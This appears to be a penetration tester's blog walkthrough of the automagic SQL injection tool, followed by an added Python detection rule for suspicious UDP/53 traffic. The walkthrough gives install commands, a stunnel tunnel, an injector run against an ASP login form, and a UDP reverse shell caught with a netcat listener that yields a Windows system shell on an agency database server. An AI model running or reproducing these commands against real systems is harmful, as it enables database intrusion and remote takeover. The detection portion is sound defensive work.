Automagic
I have used automagic during an audit to enumerate tables and data from a backend database that was reachable through a SQL injection vulnerability. This tool was successful where the tool that comes with HP WebInspect was not.
The description of automagic from www.packetstormsecurity.org is as follows:
The automagic SQL Injector is part of the Sec-1 Exploit Arsenal provided as part of the Applied Hacking & Intrusion Prevention training courses. In a nutshell it’s an automated SQL injection tool designed to help save time on pen tests. It is only designed to work with vanilla Microsoft SQL injection holes where errors are returned.
The comments in the Perl script say that it should be used on a Windows system. However, I had no problems using it on my Linux penetration testing laptop running Ubuntu 8.04. The script does not support SSL, which is a problem if the site you are auditing only communicates over port 443. This is rectified by using stunnel to handle the SSL communication. I'm not a fan of stunnel version 4. Below are the instructions on how I got stunnel version 3 running on my Ubuntu 8.04 system. For complete instructions on how I get all my tools installed on my system, see my tutorial here.
#apt-get install libssl-dev zlib1g-dev
Download the latest stunnel version 3
http://www.stunnel.org/download/stunnel/src/stunnel-3.26.tar.gz
#wget http://www.stunnel.org/download/stunnel/src/stunnel-3.26.tar.gz
#tar zxvf stunnel-3.26.tar.gz
#cd stunnel-3.26
#./configure --prefix=/usr --bindir=/usr/bin --sbindir=/usr/bin
#make
#make install
When asked, enter the following information (or whatever your agency's information is):
Country Name (2 letter code) [PL]:US
State or Province Name (full name) [Some-State]:Georgia
Locality Name (eg, city) []:Atlanta
Organization Name (eg, company) [Stunnel Developers Ltd]:DOAA
Organizational Unit Name (eg, section) []:ISAAS
Common Name (FQDN of your server) [localhost]:audits.state.ga.us
Download automagic from www.packetstormsecurity.org
#wget http://packetstormsecurity.org/UNIX/scanners/automagic.zip
#unzip automagic.zip
Below is a simple demonstration of getting a reverse shell back to my laptop, giving me access to the database server as a local administrator.
root@edge-linuxpen:~/automagic# stunnel3 -c -d localhost:80 -r state.govt.agency.us:443
root@edge-linuxpen:~/automagic# perl injector.pl -h localhost -f /APPLICATION/Folder/Authentication.asp -t POST -q YES
[*] Welcome to the Sec-1 Automagical SQL injector [*]
http://www.sec-1.com
Author: Gary O'leary-Steele
Ver: 0.1 Beta
Date: 7/11/05
[!] Please enter the vulnerable POST string placing the keyword
QUERYHERE within the vulnerable POST param.
Note: A command line param -q YES|NO inserts a quote character
before the injected SQL.However if there are any other requirements
such as closing parentheses they should be added here.
e.g Param:username=hello&password=QUERYHERE
Post Param:Submit=Submit&Password=pwned&Username=QUERYHERE
Please select one of the following:
1. Explore Tables (Using CREATE table method)
2. Explore Tables (Using CAST method)
3. Upload and Execute A UDP Reverse Shell
4. Upload A file (Debug Script)
5. Interactive Shell
6. Privilege Escalation Attacks
7. Look for other SQL servers (coming soon)
Where do you want to go today?[1-6]:
Where do you want to go today?[1-6]:3
Enter your IP address:192.168.0.1
Enter you listener port:53
Uploading debug script file to localhost:80
Waiting for Debug to do its work..5 seconds...
4
Please select one of the following:
1. Explore Tables (Using CREATE table method)
2. Explore Tables (Using CAST method)
3. Upload and Execute A UDP Reverse Shell
4. Upload A file (Debug Script)
5. Interactive Shell
6. Privilege Escalation Attacks
7. Look for other SQL servers (coming soon)
Where do you want to go today?[1-6]:
On my laptop I start NetCat to listen for the connection from the database server.
root@edge-linuxpen:~/automagic# nc -vvv -l -u -p 53
listening on [any] 53 ...
connect to [192.168.0.1] from externalhost.state.govt.agency.us [xxx.xxx.xxx.xxx] 48094
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
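From the defender's side, the session above leaves the database server acting as a UDP/53 client to a host that is not its resolver, which flow or firewall logs can catch. The following detection is an added example, not part of the original post; the log line shape, the database server address and the approved resolver addresses are constructed assumptions.

```python
import ipaddress
import re
from typing import NamedTuple, Optional

# Constructed inventory: the database tier and its only legitimate resolvers.
DB_SERVERS = {ipaddress.ip_address("10.20.30.5")}
APPROVED_RESOLVERS = {ipaddress.ip_address("10.20.0.53"), ipaddress.ip_address("10.20.0.54")}

# Assumed flow-log line shape (constructed, not any vendor's real format):
#   <timestamp> proto=<udp|tcp> src=<ip>:<port> dst=<ip>:<port> bytes=<client bytes>
LINE_RE = re.compile(r"^\S+ proto=(?P<proto>\w+) src=(?P<src>[\d.]+):\d+ "
                     r"dst=(?P<dst>[\d.]+):(?P<dport>\d+) bytes=(?P<nbytes>\d+)$")

class Flow(NamedTuple):
    proto: str
    src: ipaddress.IPv4Address
    dst: ipaddress.IPv4Address
    dport: int
    nbytes: int

def parse_flow(line: str) -> Optional[Flow]:
    """Parse one log line; lines that do not match the shape are skipped (None)."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return Flow(m["proto"].lower(), ipaddress.ip_address(m["src"]),
                ipaddress.ip_address(m["dst"]), int(m["dport"]), int(m["nbytes"]))

def suspicious_reasons(f: Flow) -> list:
    """Why a UDP/53 flow from a database server looks like a shell rather than DNS."""
    reasons = []
    if f.proto == "udp" and f.dport == 53 and f.src in DB_SERVERS:
        if f.dst not in APPROVED_RESOLVERS:
            reasons.append("udp/53 to a host that is not an approved resolver")
        if f.nbytes > 512:
            reasons.append("more client bytes than DNS queries normally carry")
    return reasons

def find_suspicious(lines) -> list:
    """Return (flow, reasons) for every line that trips the rule."""
    pairs = ((f, suspicious_reasons(f)) for f in filter(None, map(parse_flow, lines)))
    return [p for p in pairs if p[1]]

SAMPLE_LOG = [  # constructed: a normal lookup, a reverse-shell flow, a SQL connection
    "2008-06-01T12:00:01Z proto=udp src=10.20.30.5:1031 dst=10.20.0.53:53 bytes=71",
    "2008-06-01T12:00:07Z proto=udp src=10.20.30.5:48094 dst=192.168.0.1:53 bytes=1840",
    "2008-06-01T12:00:09Z proto=tcp src=10.20.30.5:1032 dst=10.20.0.9:1433 bytes=300",
]
```

The same rule applied at the egress firewall (only the approved resolvers may be reached on UDP/53 from the database tier) blocks the callback outright rather than just logging it.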